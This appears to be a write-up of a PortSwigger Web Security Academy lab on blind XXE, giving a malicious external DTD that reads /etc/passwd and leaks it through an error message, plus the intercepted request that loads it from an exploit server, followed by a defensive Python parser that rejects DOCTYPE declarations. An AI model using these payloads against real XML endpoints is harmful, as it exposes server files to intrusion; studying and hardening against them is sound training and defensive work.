# Lab: Exploiting blind XXE to retrieve data via error messages

###### tags: `Portswigger Web Security Academy` `Web`

* Description: This lab has a "Check stock" feature that parses XML input but does not display the result.
* Goal: To solve the lab, use an external DTD to trigger an error message that displays the contents of the `/etc/passwd` file. The lab contains a link to an exploit server on a different domain where you can host your malicious DTD.

## Recon

This is very similar to the previous lab (Exploiting blind XXE to exfiltrate data using a malicious external DTD).

1. Complete the malicious server payload and store it on the exploit server

```xml
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'file:///invalid/%file;'>">
%eval;
%exfil;
```

2. Complete the intercepted request payload

Intercept the request that is sent when you click the `Check stock` button on any product page. Paste your malicious server URL in place of `YOUR-DTD-URL`, e.g. `https://exploit-{YOUR-RANDOM-URL}.exploit-server.net/exploit`

```xml
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "YOUR-DTD-URL"> %xxe;]>
```

3. Send the request!!!

## Exp

:::spoiler Malicious Server Payload
```xml
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'file:///invalid/%file;'>">
%eval;
%exfil;
```
:::

:::spoiler Intercept Packet Payload
```xml!
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "https://exploit-0ad100a2040f8d8e821cce250179002c.exploit-server.net/exploit"> %xxe;]>
<stockCheck>
    <productId>
        1
    </productId>
    <storeId>
        1
    </storeId>
</stockCheck>
```
:::

:::spoiler Success Screenshot
![](https://hackmd.io/_uploads/SJPESjIEh.png)

---

![](https://hackmd.io/_uploads/rJjHSjLNn.png)
:::
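The root cause in this lab is a stock-check endpoint whose XML parser accepts a DTD and resolves the external parameter entity `%xxe;`. The following added example (my own code, not part of the lab or the write-up) shows the defensive side: a stock-check parser built on Python's standard-library expat bindings that refuses any `<!DOCTYPE>` and never resolves external entities, tested against a benign body and against the intercept payload above with a placeholder (`https://dtd-host.example/evil.dtd`) standing in for the exploit-server URL.

```python
import xml.parsers.expat as expat


class DoctypeNotAllowed(ValueError):
    """Raised when a request body carries a <!DOCTYPE ...> declaration."""


def parse_stock_check(body: bytes) -> dict:
    """Return {'productId': ..., 'storeId': ...} from a <stockCheck> body.
    Any DTD aborts parsing before the internal subset or the external DTD is read."""
    parser = expat.ParserCreate()
    # Never load external parameter entities such as %xxe; (the hosted DTD).
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise DoctypeNotAllowed("DOCTYPE declarations are not accepted")

    # Returning 0 makes expat treat any remaining external reference as a
    # parse error instead of opening the URL.
    parser.StartDoctypeDeclHandler = on_doctype
    parser.ExternalEntityRefHandler = lambda ctx, base, sysid, pubid: 0

    fields, path = {}, []

    def chars(data):
        # Text may arrive in several chunks; accumulate per element.
        if path and path[-1] in ("productId", "storeId"):
            fields[path[-1]] = fields.get(path[-1], "") + data

    parser.StartElementHandler = lambda name, attrs: path.append(name)
    parser.EndElementHandler = lambda name: path.pop()
    parser.CharacterDataHandler = chars
    parser.Parse(body, True)
    return {k: v.strip() for k, v in fields.items()}


# Constructed sample bodies: a benign request and the lab's intercept payload
# with a placeholder domain in place of the exploit-server URL.
BENIGN = b"<stockCheck><productId> 1 </productId><storeId> 1 </storeId></stockCheck>"
HOSTILE = (b'<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "https://dtd-host.example/evil.dtd"> %xxe;]>'
           + BENIGN)


def check(body: bytes) -> str:
    """Classify a request body as 'ok' or 'rejected' (for logging/tests)."""
    try:
        parse_stock_check(body)
        return "ok"
    except (DoctypeNotAllowed, expat.ExpatError):
        return "rejected"
```

Rejecting the DOCTYPE outright is the simplest hardening here; logging each `rejected` body also gives a detection signal for XXE attempts against the endpoint.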